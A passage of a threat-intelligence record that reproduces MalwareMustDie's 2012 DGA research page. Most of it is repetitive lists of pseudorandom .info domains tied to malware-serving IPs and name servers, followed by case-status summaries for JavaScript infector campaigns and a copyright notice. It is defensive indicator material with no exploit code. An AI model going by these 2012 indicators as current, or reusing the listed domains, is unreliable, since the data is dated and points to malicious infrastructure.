18\n\nfzrttttthlzcewjd.info,62.116.181.25,\r\nrhofafmfwfgwwgpw.info,62.116.181.25,\r\nmrjztgcwfjzfggre.info,62.116.181.25,\r\ngcggtfilfgiiwdfw.info,62.116.181.25,\r\ncegprccwldejfwfw.info,62.116.181.25,\r\npmjjzpcerwcagtpc.info,62.116.181.25,\r\nitwgpwjifrzoajco.info,62.116.181.25,\r\nrfhwhftjormwjzfj.info,62.116.181.25,\r\nwhwfcjiwplgmriew.info,62.116.181.25,\r\nfzrttttthlzcewjd.info,62.116.181.25,\r\nrhofafmfwfgwwgpw.info,62.116.181.25,\r\nifgmhdqcfajfftqz.info,62.116.181.25,\r\ndwpoeejplrhfegwr.info,62.116.181.25,\r\nwwcwpjwrhzwwrfjf.info,62.116.181.25,\r\nidwfgjjgeorhigor.info,62.116.181.25,\r\ndwrredzpwpicfrch.info,62.116.181.25,\r\nalmmizjrdhepgfop.info,62.116.181.25,\r\nwffcrhplrgcwpwtg.info,62.116.181.25,\r\nohclwehzcigwmhce.info,62.116.181.25,\r\njqerhfpghehlghif.info,62.116.181.25,\r\nifgmhdqcfajfftqz.info,62.116.181.25,NS1.PARKINGCREW.NET, NS2.PARKINGCREW.NET\r\ndwpoeejplrhfegwr.info,62.116.181.25,NS1.PARKINGCREW.NET, NS2.PARKINGCREW.NET\r\nwwcwpjwrhzwwrfjf.info,62.116.181.25,NS1.PARKINGCREW.NET, NS2.PARKINGCREW.NET\r\nidwfgjjgeorhigor.info,62.116.181.25,NS1.PARKINGCREW.NET, NS2.PARKINGCREW.NET\r\nidwfgjjgeorhigor.info,62.116.181.25,NS1.PARKINGCREW.NET, NS2.PARKINGCREW.NET\r\ndwrredzpwpicfrch.info,62.116.181.25,NS1.PARKINGCREW.NET, NS2.PARKINGCREW.NET\r\nalmmizjrdhepgfop.info,62.116.181.25,NS1.PARKINGCREW.NET, NS2.PARKINGCREW.NET\r\nwffcrhplrgcwpwtg.info,62.116.181.25,NS1.PARKINGCREW.NET, NS2.PARKINGCREW.NET\r\nohclwehzcigwmhce.info,62.116.181.25,NS1.PARKINGCREW.NET, NS2.PARKINGCREW.NET\r\njqerhfpghehlghif.info,62.116.181.25,NS1.PARKINGCREW.NET, NS2.PARKINGCREW.NET\r\njqerhfpghehlghif.info,62.116.181.25,NS1.PARKINGCREW.NET, NS2.PARKINGCREW.NET\r\nifgmhdqcfajfftqz.info,62.116.181.25,NS1.PARKINGCREW.NET, NS2.PARKINGCREW.NET\r\ndwpoeejplrhfegwr.info,62.116.181.25,NS1.PARKINGCREW.NET, NS2.PARKINGCREW.NET\r\nwwcwpjwrhzwwrfjf.info,62.116.181.25,NS1.PARKINGCREW.NET, NS2.PARKINGCREW.NET\r\nidwfgjjgeorhigor.info,62.116.181.25,NS1.PARKINGCREW.NET, NS2.PARKINGCREW.NET\r\nidwfgjjgeorhigor.info,62.116.181.25,NS1.PARKINGCREW.NET, NS2.PARKINGCREW.NET\r\ndwrredzpwpicfrch.info,62.116.181.25,NS1.PARKINGCREW.NET, NS2.PARKINGCREW.NET\r\nalmmizjrdhepgfop.info,62.116.181.25,NS1.PARKINGCREW.NET, NS2.PARKINGCREW.NET\r\nwffcrhplrgcwpwtg.info,62.116.181.25,NS1.PARKINGCREW.NET, NS2.PARKINGCREW.NET\r\nohclwehzcigwmhce.info,62.116.181.25,NS1.PARKINGCREW.NET, NS2.PARKINGCREW.NET\r\njqerhfpghehlghif.info,62.116.181.25,NS1.PARKINGCREW.NET, NS2.PARKINGCREW.NET\r\njqerhfpghehlghif.info,62.116.181.25,NS1.PARKINGCREW.NET, NS2.PARKINGCREW.NET\r\n==================\r\n37.59.236.138\r\n==================\r\nhttps://github.com/unixfreaxjp/malwaremustdie/blob/6f69c8e4a55335b6b60a23785e98087b605ddceb/wiki/old/DGA_Research_Tips.md\r\nPage 12 of 18\n\nhdhgwwqgflwiqwtp.info,37.59.236.138,\r\ncwwppthwwwlejiwg.info,37.59.236.138,\r\npjjppdwhrrpjjccq.info,37.59.236.138,\r\npjjppdwhrrpjjccq.info,37.59.236.138,\r\nijwwgrjiolhhzpwc.info,37.59.236.138,\r\nfepzjrdeqwppzpre.info,37.59.236.138,\r\nrwhgwgjmwqffjlip.info,37.59.236.138,\r\nwgeffroawwfhthir.info,37.59.236.138,\r\neffjhejwrjghrcat.info,37.59.236.138,\r\nftctwpcrrchwqdfi.info,37.59.236.138,\r\nwfhfppacfefepwzl.info,37.59.236.138,\r\nwhieggaowrcpiljp.info,37.59.236.138,\r\niwdddhfmozlrpewj.info,37.59.236.138,\r\ndcfocihgaoffhteh.info,37.59.236.138,\r\ndcfocihgaoffhteh.info,37.59.236.138,\r\nmrtwimcraiprwogw.info,37.59.236.138,\r\ngchecwwgqwwefhgp.info,37.59.236.138,\r\nteihjtzmjjppzccf.info,37.59.236.138,\r\nawpwwoffphrwopef.info,37.59.236.138,\r\nwgwwcgidfwgpprhq.info,37.59.236.138,\r\nwgwwcgidfwgpprhq.info,37.59.236.138,\r\ntfpirqwirfzrfwwg.info,37.59.236.138,\r\nfphfegiwgpojmiai.info,37.59.236.138,\r\nteihjtzmjjppzccf.info,37.59.236.138,\r\nhdhgwwqgflwiqwtp.info,37.59.236.138,\r\ncwwppthwwwlejiwg.info,37.59.236.138,\r\npjjppdwhrrpjjccq.info,37.59.236.138,\r\npjjppdwhrrpjjccq.info,37.59.236.138,\r\nijwwgrjiolhhzpwc.info,37.59.236.138,\r\nfepzjrdeqwppzpre.info,37.59.236.138,\r\nrwhgwgjmwqffjlip.info,37.59.236.138,\r\nwgeffroawwfhthir.info,37.59.236.138,\r\neffjhejwrjghrcat.info,37.59.236.138,\r\nftctwpcrrchwqdfi.info,37.59.236.138,\r\nwfhfppacfefepwzl.info,37.59.236.138,\r\nwhieggaowrcpiljp.info,37.59.236.138,\r\niwdddhfmozlrpewj.info,37.59.236.138,\r\ndcfocihgaoffhteh.info,37.59.236.138,\r\ndcfocihgaoffhteh.info,37.59.236.138,\r\nmrtwimcraiprwogw.info,37.59.236.138,NS-CANADA.TOPDNS.COM, NS-USA.TOPDNS.COM, NS-UK.TOPDNS.COM\r\ngchecwwgqwwefhgp.info,37.59.236.138,NS-CANADA.TOPDNS.COM, NS-USA.TOPDNS.COM, NS-UK.TOPDNS.COM\r\nawpwwoffphrwopef.info,37.59.236.138,NS-CANADA.TOPDNS.COM, NS-USA.TOPDNS.COM, NS-UK.TOPDNS.COM\r\nwgwwcgidfwgpprhq.info,37.59.236.138,NS-CANADA.TOPDNS.COM, NS-USA.TOPDNS.COM, NS-UK.TOPDNS.COM\r\nwgwwcgidfwgpprhq.info,37.59.236.138,NS-CANADA.TOPDNS.COM, NS-USA.TOPDNS.COM, NS-UK.TOPDNS.COM\r\ntfpirqwirfzrfwwg.info,37.59.236.138,NS-CANADA.TOPDNS.COM, NS-USA.TOPDNS.COM, NS-UK.TOPDNS.COM\r\nfphfegiwgpojmiai.info,37.59.236.138,NS-CANADA.TOPDNS.COM, NS-USA.TOPDNS.COM, NS-UK.TOPDNS.COM\r\nhttps://github.com/unixfreaxjp/malwaremustdie/blob/6f69c8e4a55335b6b60a23785e98087b605ddceb/wiki/old/DGA_Research_Tips.md\r\nPage 13 of 18\n\n==================\r\n85.17.58.87\r\n==================\r\ngwgzzpizqamgwfwp.info,85.17.58.87,\r\ntjgarwhghjmwjwla.info,85.17.58.87,\r\ntjgarwhghjmwjwla.info,85.17.58.87,\r\ngwgzzpizqamgwfwp.info,85.17.58.87,NS-CANADA.TOPDNS.COM, NS-USA.TOPDNS.COM, NS-UK.TOPDNS.COM\r\ntjgarwhghjmwjwla.info,85.17.58.87,NS-CANADA.TOPDNS.COM, NS-USA.TOPDNS.COM, NS-UK.TOPDNS.COM\r\ntjgarwhghjmwjwla.info,85.17.58.87,NS-CANADA.TOPDNS.COM, NS-USA.TOPDNS.COM, NS-UK.TOPDNS.COM\r\nfjppppwphhzjhgpr.info,85.17.58.87,NS-CANADA.TOPDNS.COM, NS-USA.TOPDNS.COM, NS-UK.TOPDNS.COM\r\nleirgprjowgjewec.info,85.17.58.87,NS-CANADA.TOPDNS.COM, NS-USA.TOPDNS.COM, NS-UK.TOPDNS.COM\r\nfwrwdeifeicwplwj.info,85.17.58.87,NS-CANADA.TOPDNS.COM, NS-USA.TOPDNS.COM, NS-UK.TOPDNS.COM\r\nfmrfgffgffgaphwa.info,85.17.58.87,NS-CANADA.TOPDNS.COM, NS-USA.TOPDNS.COM, NS-UK.TOPDNS.COM\r\nltmejelrrhpcorea.info,85.17.58.87,NS-CANADA.TOPDNS.COM, NS-USA.TOPDNS.COM, NS-UK.TOPDNS.COM\r\nltmejelrrhpcorea.info,85.17.58.87,NS-CANADA.TOPDNS.COM, NS-USA.TOPDNS.COM, NS-UK.TOPDNS.COM\r\nplfwdomfwmrmhawc.info,85.17.58.87,NS-CANADA.TOPDNS.COM, NS-USA.TOPDNS.COM, NS-UK.TOPDNS.COM\r\nffctwpfdicpphiej.info,85.17.58.87,NS-CANADA.TOPDNS.COM, NS-USA.TOPDNS.COM, NS-UK.TOPDNS.COM\r\nfjppppwphhzjhgpr.info,85.17.58.87,NS-CANADA.TOPDNS.COM, NS-USA.TOPDNS.COM, NS-UK.TOPDNS.COM\r\nleirgprjowgjewec.info,85.17.58.87,NS-CANADA.TOPDNS.COM, NS-USA.TOPDNS.COM, NS-UK.TOPDNS.COM\r\nfwrwdeifeicwplwj.info,85.17.58.87,NS-CANADA.TOPDNS.COM, NS-USA.TOPDNS.COM, NS-UK.TOPDNS.COM\r\nfmrfgffgffgaphwa.info,85.17.58.87,NS-CANADA.TOPDNS.COM, NS-USA.TOPDNS.COM, NS-UK.TOPDNS.COM\r\nltmejelrrhpcorea.info,85.17.58.87,NS-CANADA.TOPDNS.COM, NS-USA.TOPDNS.COM, NS-UK.TOPDNS.COM\r\nltmejelrrhpcorea.info,85.17.58.87,NS-CANADA.TOPDNS.COM, NS-USA.TOPDNS.COM, NS-UK.TOPDNS.COM\r\nplfwdomfwmrmhawc.info,85.17.58.87,NS-CANADA.TOPDNS.COM, NS-USA.TOPDNS.COM, NS-UK.TOPDNS.COM\r\nffctwpfdicpphiej.info,85.17.58.87,NS-CANADA.TOPDNS.COM, NS-USA.TOPDNS.COM, NS-UK.TOPDNS.COM\r\n==================\r\n37.59.236.139\r\n==================\r\newdcrwmzwihroclc.info,37.59.236.139,\r\nzgfrldihpwwfiwza.info,37.59.236.139,\r\nwerzjrfmwjohhdre.info,37.59.236.139,\r\nchipeimrjigffwlm.info,37.59.236.139,\r\nchipeimrjigffwlm.info,37.59.236.139,\r\npwdrjifawpewrpwj.info,37.59.236.139,\r\nicfwhhhmdfewcrfz.info,37.59.236.139,\r\ncpprjgplpiheoqwf.info,37.59.236.139,\r\npfheffpgjwchawrd.info,37.59.236.139,\r\niwwdcwwpjiehjliw.info,37.59.236.139,\r\niwwdcwwpjiehjliw.info,37.59.236.139,\r\nfiocgiwhoiwtjwmc.info,37.59.236.139,\r\nrawidpmcfwojiriq.info,37.59.236.139,\r\nhttps://github.com/unixfreaxjp/malwaremustdie/blob/6f69c8e4a55335b6b60a23785e98087b605ddceb/wiki/old/DGA_Research_Tips.md\r\nPage 14 of 18\n\nwopfrwiereggjjih.info,37.59.236.139,\r\nwrhelwhaaezippem.info,37.59.236.139,\r\nwhwfjhicpthaiwwh.info,37.59.236.139,\r\nopjepgrigfwiehed.info,37.59.236.139,\r\njfwipfgrpcowjpet.info,37.59.236.139,\r\nrwfhtfzzfwdelcer.info,37.59.236.139,\r\njiajrrgfdighiqwj.info,37.59.236.139,\r\njiajrrgfdighiqwj.info,37.59.236.139,\r\ncaepocfephpiecii.info,37.59.236.139,\r\ngofegwzgjrljzgad.info,37.59.236.139,\r\nhfhawjlfwwrzimjg.info,37.59.236.139,EAST.INAPPLE.COM, NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\nchipeimrjigffwlm.info,37.59.236.139,EAST.INAPPLE.COM, NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\nchipeimrjigffwlm.info,37.59.236.139,EAST.INAPPLE.COM, NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\npwdrjifawpewrpwj.info,37.59.236.139,EAST.INAPPLE.COM, NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\nicfwhhhmdfewcrfz.info,37.59.236.139,EAST.INAPPLE.COM, NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\ncpprjgplpiheoqwf.info,37.59.236.139,EAST.INAPPLE.COM, NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\npfheffpgjwchawrd.info,37.59.236.139,EAST.INAPPLE.COM, NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\niwwdcwwpjiehjliw.info,37.59.236.139,EAST.INAPPLE.COM, NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\nfiocgiwhoiwtjwmc.info,37.59.236.139,EAST.INAPPLE.COM, NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\nrawidpmcfwojiriq.info,37.59.236.139,EAST.INAPPLE.COM, NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\nwopfrwiereggjjih.info,37.59.236.139,EAST.INAPPLE.COM, NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\nwrhelwhaaezippem.info,37.59.236.139,EAST.INAPPLE.COM, NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\nwerzjrfmwjohhdre.info,37.59.236.139,EAST.INAPPLE.COM, NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\nwerzjrfmwjohhdre.info,37.59.236.139,EAST.INAPPLE.COM, NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\nwhwfjhicpthaiwwh.info,37.59.236.139,EAST.INAPPLE.COM, NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\nopjepgrigfwiehed.info,37.59.236.139,EAST.INAPPLE.COM, NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\njfwipfgrpcowjpet.info,37.59.236.139,EAST.INAPPLE.COM, NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\nrwfhtfzzfwdelcer.info,37.59.236.139,EAST.INAPPLE.COM, NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\njiajrrgfdighiqwj.info,37.59.236.139,EAST.INAPPLE.COM, NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\njiajrrgfdighiqwj.info,37.59.236.139,EAST.INAPPLE.COM, NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\ncaepocfephpiecii.info,37.59.236.139,EAST.INAPPLE.COM, NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\ngofegwzgjrljzgad.info,37.59.236.139,EAST.INAPPLE.COM, NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\nhrzzgzqwwwwehhje.info,37.59.236.139,EAST.INAPPLE.COM, NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\nzcfglifwjaihwcww.info,37.59.236.139,EAST.INAPPLE.COM, NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\neeiaeaaaaipgimjf.info,37.59.236.139,EAST.INAPPLE.COM, NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\neeiaeaaaaipgimjf.info,37.59.236.139,EAST.INAPPLE.COM, NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\newdcrwmzwihroclc.info,37.59.236.139,EAST.INAPPLE.COM, NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\nzgfrldihpwwfiwza.info,37.59.236.139,EAST.INAPPLE.COM, NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\nqltzcgfgigcrzgpm.info,37.59.236.139,EAST.INAPPLE.COM, NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\nhfhawjlfwwrzimjg.info,37.59.236.139,EAST.INAPPLE.COM, NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\nhrzzgzqwwwwehhje.info,37.59.236.139,EAST.INAPPLE.COM NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\nzcfglifwjaihwcww.info,37.59.236.139,EAST.INAPPLE.COM NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\neeiaeaaaaipgimjf.info,37.59.236.139,EAST.INAPPLE.COM NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\neeiaeaaaaipgimjf.info,37.59.236.139,EAST.INAPPLE.COM NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\newdcrwmzwihroclc.info,37.59.236.139,EAST.INAPPLE.COM NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\nzgfrldihpwwfiwza.info,37.59.236.139,EAST.INAPPLE.COM NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\nqltzcgfgigcrzgpm.info,37.59.236.139,EAST.INAPPLE.COM NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\nhttps://github.com/unixfreaxjp/malwaremustdie/blob/6f69c8e4a55335b6b60a23785e98087b605ddceb/wiki/old/DGA_Research_Tips.md\r\nPage 15 of 18\n\nhfhawjlfwwrzimjg.info,37.59.236.139,EAST.INAPPLE.COM NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\nchipeimrjigffwlm.info,37.59.236.139,EAST.INAPPLE.COM NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\nchipeimrjigffwlm.info,37.59.236.139,EAST.INAPPLE.COM NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\npwdrjifawpewrpwj.info,37.59.236.139,EAST.INAPPLE.COM NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\nicfwhhhmdfewcrfz.info,37.59.236.139,EAST.INAPPLE.COM NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\ncpprjgplpiheoqwf.info,37.59.236.139,EAST.INAPPLE.COM NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\npfheffpgjwchawrd.info,37.59.236.139,EAST.INAPPLE.COM NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\niwwdcwwpjiehjliw.info,37.59.236.139,EAST.INAPPLE.COM NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\niwwdcwwpjiehjliw.info,37.59.236.139,EAST.INAPPLE.COM NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\nfiocgiwhoiwtjwmc.info,37.59.236.139,EAST.INAPPLE.COM NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\nrawidpmcfwojiriq.info,37.59.236.139,EAST.INAPPLE.COM NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\nwopfrwiereggjjih.info,37.59.236.139,EAST.INAPPLE.COM NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\nwrhelwhaaezippem.info,37.59.236.139,EAST.INAPPLE.COM NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\nwhwfjhicpthaiwwh.info,37.59.236.139,EAST.INAPPLE.COM, NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\nopjepgrigfwiehed.info,37.59.236.139,EAST.INAPPLE.COM, NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\njfwipfgrpcowjpet.info,37.59.236.139,EAST.INAPPLE.COM, NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\nrwfhtfzzfwdelcer.info,37.59.236.139,EAST.INAPPLE.COM, NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\njiajrrgfdighiqwj.info,37.59.236.139,EAST.INAPPLE.COM, NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\njiajrrgfdighiqwj.info,37.59.236.139,EAST.INAPPLE.COM, NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\ncaepocfephpiecii.info,37.59.236.139,EAST.INAPPLE.COM, NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\ngofegwzgjrljzgad.info,37.59.236.139,EAST.INAPPLE.COM, NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\nhrzzgzqwwwwehhje.info,37.59.236.139,EAST.INAPPLE.COM, NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\nzcfglifwjaihwcww.info,37.59.236.139,EAST.INAPPLE.COM, NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\neeiaeaaaaipgimjf.info,37.59.236.139,EAST.INAPPLE.COM, NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\neeiaeaaaaipgimjf.info,37.59.236.139,EAST.INAPPLE.COM, NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\n-------------------------\r\n # MalwareMustDie\r\n Sat Nov 3 16:43:50 JST 2012\r\n------------------------\r\nDGA Project Monitoring\r\nWe have a very basic monitoring as per applied in the below textual format, the publicly published is as per below\r\npastes, t goal is to follow the trend of DGA spotted, to understand it activation and infection range:\r\n#MalwareMustDie!! | Sun Nov 4 14:52:22 JST 2012\r\n*) This is a compilation of overall Pseudorandom / DGA\r\n Cases of JS/RunforrestRun Infectors Handled by MMD - Overall\r\n---------------------------------------------------------------------------\r\n*) There are 3three more previous cases left which is currently under sort now..\r\n We'll do the best, done in compiling 4 cases below...\r\n---------------------------------------------------------------------------\r\n[1] Update Status of url/domains of DGA / Pseudorandom infectors\r\nRef1: http://malwaremustdie.blogspot.jp/2012/10/fuzzy-in-manual-cracking-of.html (Case Details)\r\nRef2: http://pastebin.com/raw.php?i=tGiTcJ4H (Infector details)\r\nhttps://github.com/unixfreaxjp/malwaremustdie/blob/6f69c8e4a55335b6b60a23785e98087b605ddceb/wiki/old/DGA_Research_Tips.md\r\nPage 16 of 18\n\nRef3: http://pastebin.com/raw.php?i=vrRq35JF (Current status)\r\nresult: ACTIVATED\r\n---------------------------------------------------------------------------\r\n[2] Update Status of url/domains of DGA / Pseudorandom infectors\r\nRef1: http://malwaremustdie.blogspot.jp/2012/09/malware-hunting-log-jspseudorandom.html (Case Details)\r\nRef2: http://pastebin.com/raw.php?i=tGiTcJ4H (Infector details1)\r\nRef3: http://pastebin.com/raw.php?i=9zQt23hv (Infector details2)\r\nRef4: http://pastebin.com/raw.php?i=AE3a6xpH (Report)\r\nResult: NOT ACTIVATED\r\n---------------------------------------------------------------------------\r\n[3] Update Status of url/domains of DGA / Pseudorandom infectors\r\nRef1: http://pastebin.com/raw.php?i=S0cs87P1 (Case details)\r\nRef2: http://pastebin.com/raw.php?i=F05WXQ2Z (Burped Infectors)\r\nRef3: http://pastebin.com/raw.php?i=XXtEbTSZ (Report)\r\nResult: NOT ACTIVATED\r\n---------------------------------------------------------------------------\r\n[4] Update Status of url/domains of DGA / Pseudorandom infectors\r\nRef1: http://pastebin.com/raw.php?i=0VM5ycgq (first type of deobfs burped urls)\r\nRef2: http://pastebin.com/raw.php?i=xjwM4gfy (second type of deobfs burped urls)\r\nRef3: http://pastebin.com/raw.php?i=VvQAk9m1 (Report)\r\nresult: ACTIVATED\r\n---------------------------------------------------------------------------\r\n[5] Update Status of url/domains of DGA / Pseudorandom infectors, Case JS/PseudoRandom\r\nRef1: http://malwaremustdie.blogspot.jp/2012/10/decoding-multilayer-javascript-packed.html\r\nRef2: http://pastebin.com/raw.php?i=p6EjiDg7 (Burped Infectors domains)\r\nRef3: Same as case [3] http://pastebin.com/raw.php?i=XXtEbTSZ\r\nStatus: NOT ACTIVATED\r\nCase [6][7] was actually repititions of the case [1][2] no new information available.\r\nCopyright\r\nAll of the material written here are belongto MalwareMustDie, NPO\r\n Research Group \u003chttp://malwaremustdie.org\u003e.\r\nThe mention and usage without written permission is strictly\r\nprohibited.\r\nIt is all hard works of sleepless team of IT engineers who sacrifice\r\nhttps://github.com/unixfreaxjp/malwaremustdie/blob/6f69c8e4a55335b6b60a23785e98087b605ddceb/wiki/old/DGA_Research_Tips.md\r\nPage 17 of 18\n\ntheir rest time after long daily work hours to contribute this\r\ndocumentation, please respect it by contacting us upon any\r\nuse for publicity.\r\n#MalwareMustDie!\r\nSource: https://github.com/unixfreaxjp/malwaremustdie/blob/6f69c8e4a55335b6b60a23785e98087b605ddceb/wiki/old/DGA_Research_Tips.\r\nmd\r\nhttps://github.com/unixfreaxjp/malwaremustdie/blob/6f69c8e4a55335b6b60a23785e98087b605ddceb/wiki/old/DGA_Research_Tips.md\r\nPage 18 of 18", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "origins": [ "web" ], "references": [ "https://github.com/unixfreaxjp/malwaremustdie/blob/6f69c8e4a55335b6b60a23785e98087b605ddceb/wiki/old/DGA_Research_Tips.md" ], "report_names": [ "DGA_Research_Tips.md" ], "threat_actors": [ { "id": "d90307b6-14a9-4d0b-9156-89e453d6eb13", "created_at": "2022-10-25T16:07:23.773944Z", "updated_at": "2026-04-10T02:00:04.746188Z", "deleted_at": null, "main_name": "Lead", "aliases": [ "Casper", "TG-3279" ], "source_name": "ETDA:Lead", "tools": [ "Agentemis", "BleDoor", "Cobalt Strike", "CobaltStrike", "RbDoor", "RibDoor", "Winnti", "cobeacon" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434127, "ts_updated_at": 1775826750, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/0f0c4de6c332598a7f3d51403ce07d8b88b19878.pdf", "text": "https://archive.orkl.eu/0f0c4de6c332598a7f3d51403ce07d8b88b19878.txt", "img": "https://archive.orkl.eu/0f0c4de6c332598a7f3d51403ce07d8b88b19878.jpg" } }